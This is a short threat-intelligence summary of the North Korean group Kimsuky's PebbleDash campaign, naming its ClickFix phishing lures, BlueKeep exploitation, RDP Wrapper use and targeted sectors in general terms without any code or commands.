Kimsuky's PebbleDash Campaign: PowerShell Attacks &- RDP Bypass Tactics - #Kimsuky
The North Korean hacking group Kimsuky, also known as Emerald Sleet or VELVET CHOLLIMA, has significantly evolved its tactics in recent cyber espionage campaigns. They've adopted sophisticated social engineering techniques like 'ClickFix' and 'ClickRegister,' tricking victims into executing malicious PowerShell scripts by impersonating trusted sources. Kimsuky has also leveraged vulnerabilities such as BlueKeep and employed custom tools like RDP Wrappers and proxy malware for stealthier remote access. Their attacks typically begin with spear-phishing emails containing malicious attachments, leading to the deployment of various payloads including the PebbleDash backdoor, keyloggers, and information stealers. The group has targeted a wide range of sectors including government agencies, NGOs, and media companies across multiple continents, with a primary focus on South Korea. These developments underscore Kimsuky's increasing sophistication and persistence in cyber espionage operations, necessitating enhanced security measures and user awareness.